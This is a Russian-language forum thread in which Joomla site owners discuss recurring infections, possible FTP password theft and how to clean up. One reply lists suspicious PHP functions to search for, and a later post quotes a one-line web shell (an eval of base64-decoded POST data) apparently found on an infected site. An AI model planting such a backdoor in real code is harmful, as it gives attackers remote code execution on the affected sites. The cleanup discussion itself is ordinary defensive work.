Почему поисковики отражают такие нехорошие ссылки? - Безопасность сайтов на Joomla

Зря конечно удалили, нужно было лечить. Скорее всего у вас завелся троян, который угнал кому надо пароли от фтп.

По ходу не то что бы троян... второй случай за последние пару дней.
Меня интересует версия Joomla, которая стояла.

А вот очень интересно путь к базе данных у всех зараженных  localhost или же разные ?

А вот очень интересно путь к базе данных у всех зараженных  localhost или же разные ?

Путь разный. В моем случае это был не locahost

Тоже случай? И что показало расследование?

А это то тут причем?

По моему ответ в вопросе

Народ. Вот мой сайт http://akvarim.ru. Такая же проблема. Сам дистрибудив брал на joomlaportal. Установлен JoomShopping, ultimatecontent, jcomments, aiContactSafe, Simple Image Gallery PRO Plugin v2.0

eval, base64_decode, gzuncompress, gzinflate, ob_start, str_rot13 с абракадаброй тоже весьма привлекают внимание, как и вариации на тему file, fopen, readfile, file_get_contents, HttpRequest::send с чужими адресами.

у меня такой вирус появляется раз в неделю. Я всегда заменяю зараженные файлы на нормальные.
Если я почищу комп от вирусов, и сменю пароли на сайте и сервере, это поможет надолго избавиться?

А имеет смысл удалять все вирусы с моего компа или нет?

и какой антивирус посоветуете?

Хостер тупит.

Мож кто посоветует достойный софт?

просто, осталось всего ничего - пакетно заменить эти строки тупо на пробел и залить обратно через хостинг панель

Я имею ввиду ..........заменит текст на пробельчик

<?php eval(base64_decode($_POST["php"])); ?>

А в чем именно это выражается?

http://joomlaforum.ru/index.php/topic,198048и через час опять все будет на своем месте